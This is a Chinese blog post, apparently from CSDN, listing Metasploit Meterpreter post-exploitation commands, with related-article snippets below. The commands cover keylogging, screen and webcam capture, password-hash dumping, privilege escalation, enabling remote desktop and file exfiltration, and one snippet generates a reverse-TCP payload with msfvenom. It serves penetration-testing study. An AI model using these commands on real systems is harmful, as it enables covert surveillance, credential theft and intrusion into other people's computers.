Metasploit渗透——meterpreter基础命令

最新推荐文章于 2024-02-27 09:22:38 发布
最新推荐文章于 2024-02-27 09:22:38 发布
阅读量278 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120305541
版权

Meterpreter
系统信息

sysinfo

用户标识

getuid

获取权限

getsystem

当前目录

pwd

列举进程

ps

键盘记录

##扫描远程计算机键盘活动
keyscan_start

##显示远程计算机键盘活动
keyscan_dump

##停止扫描远程计算机键盘活动
keyscan_stop

在这里插入图片描述

显示驱动器

show_mount

截屏
保存远程PC的屏幕截图

screenshot

在这里插入图片描述

从kali上传文件

upload /root/abc.exe C:\\system32\\

下载

download C:\\pass.txt /root/

获取远程计算机的cmd

shell

服务器sid

getsid

远程计算机IP地址及Mac地址

ipconfig

将当前活动的Meterpreter会话发送到后台

background

将当前进程从一个端口迁移到另一个

migrate <端口>

在这里插入图片描述

重启远程计算机

reboot

摄像头

##查看是否具有摄像头
webcarm_list

##摄像头拍摄照片
webcam_snap

##摄像头开启视频
webcam_stream

当前进程的pid

getpid

当地时间

localtime

生成文件hash值

checksum md5 abc.txt

读取文件

cat my.ini

复制文件

cp abc.txt pass.txt
cp <旧文件> <新文件>

目录

dir

编辑文件

edit abc.txt
##和vim命令的使用方法相同

移动文件

mv <旧文件目录> <新文件目录>
##和linux中的mv命令相同

删除文件

rm <file1> <file2> ...
##和linux中的rm命令相同

创建目录

mkdir <目录名1> <目录名2> ...

搜索

search -f *.jpeg

开启靶机3389端口

run getgui -e

枚举账户hash散列值

run hashdump

列举后渗透模块

load -l

在这里插入图片描述

内网渗透-Metasploit之——基本后渗透命令
lza20001103的博客
07-18 553
内网渗透-Metasploit之——基本后渗透命令
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 887
本节学习客户端渗透
meterpreter基本命令
weixin_33953249的博客
01-20 320
screenshot :截屏,获取用户的桌面截屏 sysinfo:获取系统运行的平台 ps:获得目标系统正在运行的进程 migrate 进程号:将会话迁移到进程里面 run post/windows/capture/keylog_recorder:在进程空间下启用这个模块,获取键盘记录 除了使用键盘记录来记录登陆名和用户密码之外,还可以使用命令来获取密码哈希值 use...
Meterprete端口转发
qq_38409397的博客
11-04 501
Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题; 命令:portfwd 攻击机:kali 10.10.1.104 靶机:windowsxp 10.10.1.103 靶机打开3389端口方便验证 #portfwd 拿到目标机的meterpreter shell 生成一个木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > she
Meterpreter使用总结(1)
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
关于 后渗透 - Meterpreter 的使用
辉小鱼的博客
09-05 2454
关于 Metasploit (MSF) 工具的后渗透 - Meterpreter 的学习与使用。了解一些漏洞的基本原理及使用方法。
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 2908
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Kali linux 学习笔记(九十七)metasploit framework——后渗透阶段(一) 2020.4.29
闵行小鱼塘
04-29 873
在获取shell后,需要扩大战果,提权,信息收集,渗透内网,永久后门
渗透测试神器——Metasploit Framerwork使用
PICACHU+++的博客
02-19 4161
一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描,半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描
渗透测试——Meterpreter
YT的博客
02-18 2117
Meterpreter 优点: 平台通用性:Meterpreter 提供了基于 JAVA 和 PHP 语言的实现,以应用在各种不同的环境中 纯内存工作模式:执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标进程空间中,而不是先将 Meterpreter 上传到磁盘然后再调用 Loadlibrary 加载动态链接库来启动 Meterpreter。这里便会有一个技术...
12.5、后渗透测试--内网主机屏幕截图
无痕的博客
12-14 1459
metasploit渗透meterpreter测试--内网主机屏幕截图
Metasploit(一)--Meterpreter命令速查表
weixin_34167819的博客
08-27 917
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 6335
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
【kali-漏洞利用】(3.3)后渗透Meterpreter(上):命令大全
08-06 4138
【kali-漏洞利用】Meterpreter渗透
Metasploit学习笔记(四)——Meterpreter渗透之信息搜集
Zichel77的博客
10-07 1648
此时就需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令,就可以抓取此时目标机的屏幕截图。在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有。所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。利用前面永恒之蓝的步骤一模一样,就可以进到后渗透的步骤meterpreter,前面的详细步骤参考。
Metasploit渗透命令大全讲解——超详细
渗透测试
05-14 4094
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
永恒之蓝(ms017-010)漏洞利用
菜鸟-传奇
04-09 1660
永恒之蓝(ms017-010)漏洞利用 1、实验环境 靶机win7 地址:192.168.1.xxx 登录密码:xxxx 攻击机:kaillinux 地址:192.168.1.xxx 登录用户名:root 登录密码:xxx 2、实验原理: “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。 445端口简介: 445端口是一个毁誉参半的端口,有了它我们可以...
Metasploit渗透测试框架基础知识详解
Metasploit渗透测试框架基础 Metasploit渗透测试框架基础渗透测试领域的基础知识, Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。该框架附带数百个已知软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值